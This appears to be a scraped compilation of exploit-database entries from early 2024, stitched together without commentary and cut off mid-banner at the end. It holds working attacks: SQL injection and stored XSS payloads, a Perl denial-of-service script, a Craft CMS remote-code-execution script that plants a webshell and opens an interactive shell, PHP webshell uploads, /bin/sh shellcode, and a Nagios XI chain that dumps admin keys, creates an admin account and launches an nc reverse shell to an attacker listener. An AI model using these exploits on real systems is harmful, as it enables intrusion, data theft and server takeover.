ISHACK AI BOT

# Title: CSZCMS v1.3.0 - SQL Injection (Authenticated) # Author: Abdulaziz Almetairy # Date: 27/01/2024 # Vendor: https://www.cszcms.com/ # Software: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download # Reference: https://github.com/oh-az # Tested on: Windows 11, MySQL, Apache # 1 - Log in to the admin portal http://localhost/cszcms/admin/login # 2 - Navigate to General Menu > Member Users. # 3 Click the 'View' button next to any username. # 4 Intercept the request GET /cszcms/admin/members/view/1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: 86112035d26bb3c291899278f9ab4fb2_cszsess=n5v1jcdqfjuuo32ng66e4rttg65ugdss Upgrade-Insecure-Requests: 1 # 5 Modify the paramter /cszcms/admin/members/view/1 to /cszcms/admin/members/view/'or(sleep(10))# and url encode all characters /cszcms/admin/members/view/%27%6f%72%28%73%6c%65%65%70%28%31%30%29%29%23%20

#!/usr/bin/perl use Socket; # Exploit Title: minaliC 2.0.0 - Denial of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 03 january 2024 # Vendor Homepage: http://minalic.sourceforge.net/ # Notification vendor: No reported # Tested Version: minaliC 2.0.0 # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denial of Service (DoS) # Vídeo: https://www.youtube.com/watch?v=R_gkEjvpJNw #1. Description #This technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Jump to a static 'call esp' #Backwards jump to code a known distance from the stack pointer. #The server did not properly handle request with large amounts of data via method GET to web server. #The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions. #Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. #2. Proof of Concept - PoC $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); intro(); main(); print "[+] Exploiting... \n"; my $junk = "\x41" x 245; my $host = "\x41" x 135; my $i=0; while ($i <= 3) { my $buf = "GET /" . $junk . " HTTP/1.1\r\n" . "Host: " . $host . "\r\n\r\n"; my $sock; socket($sock, AF_INET, SOCK_STREAM, 0) or die "[-] Could not create socket: $!\n"; my $addr = sockaddr_in($port, inet_aton($ip)); connect($sock, $addr); send($sock, $buf, length($buf), 0); $i++; } print "[+] Done - Exploited success!!!!!\n\n"; sub intro { print "***************************************************\n"; print "* minaliC 2.0.0 - Denied of Service *\n"; print "* *\n"; print "* Coded by Fernando Mengali *\n"; print "* *\n"; print "* e-mail: fernando.mengalli\@gmail.com *\n"; print "* *\n"; print "***************************************************\n"; } sub main { our ($ip, $port) = @ARGV; unless (defined($ip) && defined($port)) { print " \nUsage: $0 <ip> <port> \n"; exit(-1); } }

#!/usr/bin/env python3 #coding: utf-8 # Exploit Title: Craft CMS unauthenticated Remote Code Execution (RCE) # Date: 2023-12-26 # Version: 4.0.0-RC1 - 4.4.14 # Vendor Homepage: https://craftcms.com/ # Software Link: https://github.com/craftcms/cms/releases/tag/4.4.14 # Tested on: Ubuntu 22.04.3 LTS # Tested on: Craft CMS 4.4.14 # Exploit Author: Olivier Lasne # CVE : CVE-2023-41892 # References : # https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g # https://blog.calif.io/p/craftcms-rce import requests import sys, re if(len(sys.argv) < 2): print(f"\033[1;96mUsage:\033[0m python {sys.argv[0]} \033[1;96m<url>\033[0m") exit() HOST = sys.argv[1] if not re.match('^https?://.*', HOST): print("\033[1;31m[-]\033[0m URL should start with http or https") exit() print("\033[1;96m[+]\033[0m Executing phpinfo to extract some config infos") ## Execute phpinfo() and extract config info from the website url = HOST + '/index.php' content_type = {'Content-Type': 'application/x-www-form-urlencoded'} data = r'action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream","__construct()":[{"close":null}],"_fn_close":"phpinfo"}}' try: r = requests.post(url, headers=content_type, data=data) except: print(f"\033[1;31m[-]\033[0m Could not connect to {HOST}") exit() # If we succeed, we should have default phpinfo credits if not 'PHP Group' in r.text: print(f'\033[1;31m[-]\033[0m {HOST} is not exploitable.') exit() # Extract config value for tmp_dir and document_root pattern1 = r'<tr><td class="e">upload_tmp_dir<\/td><td class="v">(.*?)<\/td><td class="v">(.*?)<\/td><\/tr>' pattern2 = r'<tr><td class="e">\$_SERVER\[\'DOCUMENT_ROOT\'\]<\/td><td class="v">([^<]+)<\/td><\/tr>' tmp_dir = re.search(pattern1, r.text, re.DOTALL).group(1) document_root = re.search(pattern2, r.text, re.DOTALL).group(1) if 'no value' in tmp_dir: tmp_dir = '/tmp' print(f'temporary directory: {tmp_dir}') print(f'web server root: {document_root}') ## Create shell.php in tmp_dir data = { "action": "conditions/render", "configObject[class]": "craft\elements\conditions\ElementCondition", "config": '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/etc/passwd"}}}' } files = { "image1": ("pwn1.msl", """<?xml version="1.0" encoding="UTF-8"?> <image> <read filename="caption:<?php @system(@$_REQUEST['cmd']); ?>"/> <write filename="info:DOCUMENTROOT/shell.php"/> </image>""".replace("DOCUMENTROOT", document_root), "text/plain") } print(f'\033[1;96m[+]\033[0m create shell.php in {tmp_dir}') r = requests.post(url, data=data, files=files) #, proxies={'http' : 'http://127.0.0.1:8080'}) # # Use the Imagick trick to move the webshell in DOCUMENT_ROOT data = { "action": "conditions/render", "configObject[class]": r"craft\elements\conditions\ElementCondition", "config": '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"vid:msl:' + tmp_dir + r'/php*"}}}' } print(f'\033[1;96m[+]\033[0m trick imagick to move shell.php in {document_root}') r = requests.post(url, data=data) #, proxies={"http": "http://127.0.0.1:8080"}) if r.status_code != 502: print("\033[1;31m[-]\033[0m Exploit failed") exit() print(f"\n\033[1;95m[+]\033[0m Webshell is deployed: {HOST}/\033[1mshell.php\033[0m?cmd=whoami") print(f"\033[1;95m[+]\033[0m Remember to \033[1mdelete shell.php\033[0m in \033[1m{document_root}\033[0m when you're done\n") print("\033[1;92m[!]\033[0m Enjoy your shell\n") url = HOST + '/shell.php' ## Pseudo Shell while True: command = input('\033[1;96m>\033[0m ') if command == 'exit': exit() if command == 'clear' or command == 'cls': print('\n' * 100) print('\033[H\033[3J', end='') continue data = {'cmd' : command} r = requests.post(url, data=data) #, proxies={"http": "http://127.0.0.1:8080"}) # exit if we have an error if r.status_code != 200: print(f"Error: status code {r.status_code} for {url}") exit() res_command = r.text res_command = re.sub('^caption:', '', res_command) res_command = re.sub(' CAPTION.*$', '', res_command) print(res_command, end='')

# Exploit Title: SPA-CART CMS - Stored XSS # Date: 2024-01-03 # Exploit Author: Eren Sen # Vendor: SPA-Cart # Vendor Homepage: https://spa-cart.com/ # Software Link: https://demo.spa-cart.com/ # Version: [1.9.0.3] # CVE-ID: N/A # Tested on: Kali Linux / Windows 10 # Vulnerabilities Discovered Date : 2024/01/03 # Vulnerability Type: Stored Cross Site Scripting (XSS) Vulnerability # Vulnerable Parameter Type: POST # Vulnerable Parameter: descr # Proof of Concept: demo.spa-cart.com/product/258 # HTTP Request: POST ////admin/products/258 HTTP/2 Host: demo.spa-cart.com Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx; remember=xxxxxxxxxxxxxxxx Content-Length: 1906 Sec-Ch-Ua: Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUsO8JxBs6LhB8LSl X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Sec-Ch-Ua-Platform: "" Origin: https://demo.spa-cart.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://demo.spa-cart.com////admin/products/258 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="mode" ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="sku" SKU386 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="name" asdf ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="cleanurl" Wholesale-DIY-Jewelry-Faceted-70pcs-6-8mm-Red-AB-Rondelle-glass-Crystal-Beads ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="avail" 1000 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="price" 0.00 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="list_price" 2 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="weight" 0.00 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="categoryid" 42 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="categories[]" 8 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="categories[]" 37 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="brandid" 4 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="status" 1 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="keywords" ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="descr" <script>alert(1)</script> ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="title_tag" ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="meta_keywords" ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="meta_description" ------WebKitFormBoundaryUsO8JxBs6LhB8LSl--

# Exploit Title:Insurance Management System PHP and MySQL 1.0 - Multiple Stored XSS # Date: 2024-02-08 # Exploit Author: Hakkı TOKLU # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html # Version: 1.0 # Tested on: Windows 11 / PHP 8.1 & XAMPP 3.3.0 Support Ticket Click on Support Tickets > Generate and add payload <img src=x onerror=prompt("xss")> to Subject and Description fields, then send the request. When admin visits the Support Tickets page, XSS will be triggered. Example Request : POST /e-insurance/Script/user/core/new_ticket HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 139 Cookie: PHPSESSID=17ot0ij8idrm2br6mmmc54fg15; __insuarance__logged=1; __insuarance__key=LG3LFIBJCN9DKVXKYS41 category=4&subject=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&description=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&submit=1 Create Account Click on New Account button on login page, then fill the fields. Inject <img src=x onerror=prompt("xss")> payloads to fname, lname, city and street parameter, then click Create Account button. XSS will be triggered when admin visits Users page. Example Request : POST /e-insurance/Script/core/new_account HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 303 Cookie: PHPSESSID=17ot0ij8idrm2br6mmmc54fg15 fname=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&lname=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&gender=Male&phone=5554443322&city=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&street=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&email=test1%40test.com&password=Test12345&submit=1

+ Exploit Title: MobileShop master v1.0 - SQL Injection Vuln. + Date: 2024-13-03 + Exploit Author: "HAZIM ARBAŞ" from EMA Security LTD - Siber Güvenlik ve Bilişim Hizmetleri (https://emasecurity.com) + Vendor Homepage: https://code-projects.org/mobile-shop-in-php-css-javascript-and-mysql-free-download/ + Software Link: https://download-media.code-projects.org/2020/04/Mobile_Shop_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip + Tested on: Windows 10 Pro + CWE: CWE-89 + CVSS: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + Type: WebApps + Platform: PHP ## References: + https://cwe.mitre.org/data/definitions/89.html + https://owasp.org/Top10/A03_2021-Injection/ ## Description: The MobileShop-master application is susceptible to SQL Injection through the 'id' parameter in "/MobileShop-master/Details.php". Exploiting this vulnerability could lead to severe consequences, including unauthorized access, data manipulation, and potential exploitation of other vulnerabilities within the underlying database. It is imperative to address this issue promptly to mitigate the risk of compromise and ensure the security and integrity of the application and its data. ## Proof of Concept: + Go to the Login page: "http://localhost/MobileShop-master/Login.html" + Fill email and password. + Select any product and intercept the request via Burp Suite, then send it to Repeater. + Change the 'id' value to any of the below payloads. + Send the request ## Payloads: + id=1' AND 9071=9071 AND 'EtdU'='EtdU + id=1' AND (SELECT 7012 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(7012=7012,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wwwk'='wwwk + id=1' UNION ALL SELECT NULL,CONCAT(0x7176787071,0x7867535464594a544c58796246766f6a444c4358426b596c71724b59676455644b66794858734670,0x7171717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - + Or you can write your own payloads ## Proof of Concept Using SqlMap: + Go to the Login page: "http://localhormst/MobileShop-master/Login.html" + Fill email and password. + Select any product and intercept the request via Burp Suite, then send it to Repeater. + Copy to File the request to a "sql.txt" file. + Run the following sqlmap command + sqlmap -r sql.txt -p id --dbs ``` POST /MobileShop-master/Details.php HTTP/1.1 Host: localhost Content-Length: 42 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://localhost/MobileShop-master/MobilesList.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=mh3mnpf51bj2q17hg8sipbltnn Connection: close id=1 ``` + Use sqlmap to exploit. In sqlmap, use 'id' parameter to dump the database. ``` sqlmap -r sql.txt -p id --dbs ``` ``` --- Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 9071=9071 AND 'EtdU'='EtdU Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' AND (SELECT 7012 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(7012=7012,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wwwk'='wwwk Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 7380 FROM (SELECT(SLEEP(5)))rlmI) AND 'blrN'='blrN Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7176787071,0x7867535464594a544c58796246766f6a444c4358426b596c71724b59676455644b66794858734670,0x7171717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- [04:17:04] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.2.12, Apache 2.4.58 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [04:17:04] [INFO] fetching database names [04:17:05] [INFO] resumed: 'information_schema' [04:17:05] [INFO] resumed: '1' [04:17:05] [INFO] resumed: '3' [04:17:05] [INFO] resumed: 'admidio' [04:17:05] [INFO] resumed: 'calender' [04:17:05] [INFO] resumed: 'corregidor' [04:17:05] [INFO] resumed: 'gym' [04:17:05] [INFO] resumed: 'joomla_db' [04:17:05] [INFO] resumed: 'linkstack' [04:17:05] [INFO] resumed: 'mobileshop' [04:17:05] [INFO] resumed: 'mysql' [04:17:05] [INFO] resumed: 'nickey' [04:17:05] [INFO] resumed: 'performance_schema' [04:17:05] [INFO] resumed: 'phpmyadmin' [04:17:05] [INFO] resumed: 'rcms' [04:17:05] [INFO] resumed: 'smith' [04:17:05] [INFO] resumed: 'telephone' [04:17:05] [INFO] resumed: 'test' [04:17:05] [INFO] resumed: 'valente' ```

#include <stdio.h> #include <string.h> #define MAX_LEN 256 #define BUFFER_OVERRUN_LENGTH 50 #define SHELLCODE_LENGTH 32 // NOP sled to increase the chance of successful shellcode execution char nop_sled[SHELLCODE_LENGTH] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; // Shellcode to execute /bin/sh char shellcode[SHELLCODE_LENGTH] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; void apply_cgi(char *vpn_client_ip) { char buffer[MAX_LEN]; strncpy(buffer, vpn_client_ip, MAX_LEN); printf("Client IP: %s\n", buffer); } int main() { char input[MAX_LEN + BUFFER_OVERRUN_LENGTH] = {0}; // Create a buffer with the malicious input // including the NOP sled, shellcode, and the overflow data int offset = strlen(nop_sled) + strlen(shellcode) - BUFFER_OVERRUN_LENGTH; strncpy(&input[0], nop_sled, offset); strncpy(&input[offset], shellcode, SHELLCODE_LENGTH); input[MAX_LEN + BUFFER_OVERRUN_LENGTH - 1] = '\x00'; // Call the vulnerable function to trigger the buffer overflow apply_cgi(input); return 0; }

# Exploit Title: Tourism Management System v2.0 - Arbitrary File Upload # Google Dork: N/A # Exploit Author: SoSPiro # Date: 2024-02-18 # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/tourism-management-system-free-download/ # Version: 2.0 # Tested on: Windows 10 Pro # Impact: Allows admin to upload all files to the web server # CVE : N/A # Exploit Description: The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. # PoC request POST /zer/tms/admin/change-image.php?imgid=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------390927495111779706051786831201 Content-Length: 361 Origin: http://localhost Connection: close Referer: http://localhost/zer/tms/admin/change-image.php?imgid=1 Cookie: PHPSESSID=eqms3ipedmm41hqa1djnu1euhv Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 X-PwnFox-Color: red -----------------------------390927495111779706051786831201 Content-Disposition: form-data; name="packageimage"; filename="phpinfo.php" Content-Type: text/plain <?php phpinfo();?> -----------------------------390927495111779706051786831201 Content-Disposition: form-data; name="submit" -----------------------------390927495111779706051786831201-- =========================================================================================== - Response - HTTP/1.1 200 OK Date: Sun, 18 Feb 2024 04:33:37 GMT Server: Apache/2.4.54 (Win64) PHP/8.1.13 mod_fcgid/2.3.10-dev X-Powered-By: PHP/8.1.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8146 ============================================================================================ - File location - http://localhost/zer/tms/admin/pacakgeimages/phpinfo.php

# Exploit Title: Wallos - File Upload RCE (Authenticated) # Date: 2024-03-04 # Exploit Author: [email protected] # Vendor Homepage: https://github.com/ellite/Wallos # Software Link: https://github.com/ellite/Wallos # Version: < 1.11.2 # Tested on: Debian 12 Wallos allows you to upload an image/logo when you create a new subscription. This can be bypassed to upload a malicious .php file. POC --- 1) Log into the application. 2) Go to "New Subscription" 3) Upload Logo and choose your webshell .php 4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like: --- SNIP ----------------- POST /endpoints/subscription/add.php HTTP/1.1 Host: 192.168.1.44 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.44/ Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324 Origin: http://192.168.1.44 Content-Length: 7220 Connection: close Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light -----------------------------29251442139477260933920738324 Content-Disposition: form-data; name="name" test -----------------------------29251442139477260933920738324 Content-Disposition: form-data; name="logo"; filename="revshell.php" Content-Type: image/jpeg GIF89a; <?php system($_GET['cmd']); ?> -----------------------------29251442139477260933920738324 Content-Disposition: form-data; name="logo-url" ----- SNIP ----- 5) You will get the response that your file was uploaded ok: {"status":"Success","message":"Subscription updated successfully"} 6) Your file will be located in: http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php

# Exploit Title: NAGIOS XI SQLI # Google Dork: [if applicable] # Date: 02/26/2024 # Exploit Author: Jarod Jaslow (MAWK) https://www.linkedin.com/in/jarod-jaslow-codename-mawk-265144201/ # Vendor Homepage: https://www.nagios.com/changelog/#nagios-xi # Software Link: https://github.com/MAWK0235/CVE-2024-24401 # Version: Nagios XI Version 2024R1.01 # Tested on: Nagios XI Version 2024R1.01 LINUX # CVE : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24401 # import requests import subprocess import argparse import re import urllib3 import os import random import string from colorama import Fore, Style urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def serviceLogin(user,password): r = requests.post(f'http://{IP}/nagiosxi/api/v1/authenticate?pretty=1',data={'username':user,'password':password,"valid_min":"5"},verify=False) print(f"{Fore.MAGENTA}[+] Authenticating with captured credtials to API....") match = re.search(r'auth_token": "(.*)"',r.text) if match: token = match.group(1) print(f'{Fore.MAGENTA}[+] Token: ' + token) r = requests.get(f'http://{IP}/nagiosxi/login.php?token={token}', verify=False) cookie = r.headers['Set-Cookie'] cookie = cookie.split(',')[0] match = re.search(r'nagiosxi=(.*);', cookie) cookie = match.group(1) print(f"{Fore.MAGENTA}[+] Auth cookie is: " + cookie) return cookie else: print(f'{Fore.RED}[-] Authentication Failed..{Style.RESET_ALL}') exit() def sqlmap(IP,username,password): print(f'{Fore.MAGENTA}[+] Starting SQLMAP...') session = requests.session() s = session.get(f'http://{IP}/nagiosxi/index.php', verify=False) match = re.search(r'var nsp_str = \"(.*?)\"', s.text) nsp = match.group(1) print(f"{Fore.MAGENTA}[+] NSP captured: " + nsp) data = {"nsp": nsp, "page": "auth", "debug": '', "pageopt": "login", "username": username, "password": password, "loginButton": ''} s = session.post(f'http://{IP}/nagiosxi/login.php', data=data) print(f"{Fore.MAGENTA}[+] Authenticated as User..") print(f"{Fore.MAGENTA}[+] Accepting license Agreement...") s = session.get(f'http://{IP}/nagiosxi/login.php?showlicense', verify=False) match = re.search(r'var nsp_str = \"(.*?)\"', s.text) nsp = match.group(1) data = {"page": "/nagiosxi/login.php", "pageopt": "agreelicense", "nsp": nsp, "agree_license": "on"} session.post(f"http://{IP}/nagiosxi/login.php?showlicense", data=data) print(f"{Fore.MAGENTA}[+] Performing mandatory password change ARGH") newPass = "mawk" data = {"page": "/nagiosxi/login.php", "pageopt": "changepass", "nsp": nsp,"current_password": password, "password1": newPass, "password2": newPass, "reporttimesubmitbutton": ''} session.post(f"http://{IP}/nagiosxi/login.php?forcepasswordchange", data=data) s= session.get(f'http://{IP}/nagiosxi/') match = re.search(r'var nsp_str = \"(.*?)\"', s.text) nsp = match.group(1) cookie = s.cookies.get('nagiosxi') sqlmap_command = f'sqlmap --flush-session -u "http://{IP}/nagiosxi//config/monitoringwizard.php/1*?update=1&nextstep=2&nsp={nsp}&wizard=mysqlserver" --cookie="nagiosxi={cookie}" --dump -D nagiosxi -T xi_users --drop-set-cookie --technique=ET --dbms=MySQL -p id --risk=3 --level=5 --threads=10 --batch' #print(sqlmap_command) sqlmap_command_output = subprocess.Popen(sqlmap_command,shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True ) try: for line in iter(sqlmap_command_output.stdout.readline, ''): if "| Nagios Administrator |" in line: match = re.search(r"Nagios Administrator \| (.*?) \|", line) if match: adminKey= match.group(1) print(f"{Fore.MAGENTA}[+] Admin Key recovered: " + adminKey) return adminKey else: print(f"{Fore.RED}[-] Could not pull Admin Key :(....{Style.RESET_ALL}") exit() break print("[-] SQLMAP capture FAILED..") sqlmap_command_output.terminate() except KeyboardInterrupt: print(f"{Fore.RED}[-] SQLMAP interrupted. Cleaning up...{Style.RESET_ALL}") sqlmap_command_output.terminate() sqlmap_command_output.communicate() exit() def createAdmin(IP,adminKey): characters = string.ascii_letters + string.digits random_username = ''.join(random.choice(characters) for i in range(5)) random_password = ''.join(random.choice(characters) for i in range(5)) data = {"username": random_username, "password": random_password, "name": random_username, "email": f"{random_username}@mail.com", "auth_level": "admin"} r = requests.post(f'http://{IP}/nagiosxi/api/v1/system/user?apikey={adminKey}&pretty=1', data=data, verify=False) if "success" in r.text: print(f'{Fore.MAGENTA}[+] Admin account created...') return random_username, random_password else: print(f'{Fore.RED}[-] Account Creation Failed!!! :(...{Style.RESET_ALL}') print(r.text) exit() def start_HTTP_server(): subprocess.Popen(["python", "-m", "http.server", "8000"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) def adminExploit(adminUsername, adminPassword, IP, LHOST,LPORT): print(f"{Fore.MAGENTA}[+] Conducting mandatory password change...") session = requests.session() s = session.get(f'http://{IP}/nagiosxi/index.php', verify=False) match = re.search(r'var nsp_str = \"(.*?)\"', s.text) nsp = match.group(1) print(f"{Fore.MAGENTA}[+] NSP captured: " + nsp) data = {"nsp": nsp, "page": "auth", "debug": '', "pageopt": "login", "username": adminUsername, "password": adminPassword, "loginButton": ''} s = session.post(f'http://{IP}/nagiosxi/login.php', data=data) print(f"{Fore.MAGENTA}[+] Authenticated as admin..") print(f"{Fore.MAGENTA}[+] Accepting license Agreement...") s = session.get(f'http://{IP}/nagiosxi/login.php?showlicense', verify=False) match = re.search(r'var nsp_str = \"(.*?)\"', s.text) nsp = match.group(1) data = {"page": "/nagiosxi/login.php", "pageopt": "agreelicense", "nsp": nsp, "agree_license": "on"} session.post(f"http://{IP}/nagiosxi/login.php?showlicense", data=data) print(f"{Fore.MAGENTA}[+] Performing mandatory password change ARGH") newAdminPass = adminUsername + adminPassword data = {"page": "/nagiosxi/login.php", "pageopt": "changepass","current_password": adminPassword, "nsp": nsp, "password1": newAdminPass, "password2": newAdminPass, "reporttimesubmitbutton": ''} session.post(f"http://{IP}/nagiosxi/login.php?forcepasswordchange", data=data) print(f"{Fore.MAGENTA}[+] Creating new command...") data = {"tfName": adminUsername, "tfCommand": f"nc -e /usr/bin/sh {LHOST} {LPORT}", "selCommandType": "1", "chbActive": "1", "cmd": "submit", "mode": "insert", "hidId": "0", "hidName": '', "hidServiceDescription": '', "hostAddress": "127.0.0.1", "exactType": "command", "type": "command", "genericType": "command"} session.post(f'http://{IP}/nagiosxi/includes/components/ccm/index.php?type=command&page=1', data=data) data = {"cmd": '', "continue": ''} start_HTTP_server() print(f"{Fore.MAGENTA}[+] Created command: " + adminUsername) session.post(f'http://{IP}/nagiosxi/includes/components/nagioscorecfg/applyconfig.php?cmd=confirm', data=data) data = {"search": adminUsername} s = session.post(f'http://{IP}/nagiosxi/includes/components/ccm/index.php?cmd=view&type=command&page=1', data=data) match = re.search(r"javascript:actionPic\('deactivate','(.*?)','", s.text) if match: commandCID = match.group(1) print(f"{Fore.MAGENTA}[+] Captured Command CID: " + commandCID) s = session.get(f"http://{IP}/nagiosxi/includes/components/ccm/?cmd=view&type=service") match = re.search(r'var nsp_str = \"(.*?)\"', s.text) if match: nsp = match.group(1) s = session.get(f"http://{IP}/nagiosxi/includes/components/ccm/command_test.php?cmd=test&mode=test&cid={commandCID}&nsp={nsp}") os.system("kill -9 $(lsof -t -i:8000)") print(f"{Fore.RED}[+] CHECK UR LISTENER") else: print(f"{Fore.RED}[-] ERROR") else: print(f"{Fore.RED}[-] Failed to capture Command CID..{Style.RESET_ALL}") if __name__ == '__main__': ascii_art = f"""{Fore.LIGHTRED_EX} ███╗ ███╗ █████╗ ██╗ ██╗██╗ ██╗ ███████╗ ██████╗██████╗ ██╗██████╗ ████████╗███████╗ ████╗ ████║██╔══██╗██║ ██║██║ ██╔╝ ██╔════╝██╔════╝██╔══██╗██║██╔══██╗╚══██╔══╝██╔════╝ ██╔████╔██║███████║██║ █╗ ██║█████╔╝ ███████╗██║ ██████╔╝██║██████╔╝ ██║ ███████╗ ██║╚██╔╝██║██╔══██║██║███╗██║██╔═██╗ ╚════██║██║ ██╔══██╗██║██╔═══╝ ██║ ╚════██║ ██║ ╚═╝ ██║██║ ██║╚███╔███╔╝██║ ██╗ ███████║╚██████╗██║ ██║██║██║ ██║ ███████║ ╚═╝ ╚═╝╚═╝ ╚═╝ 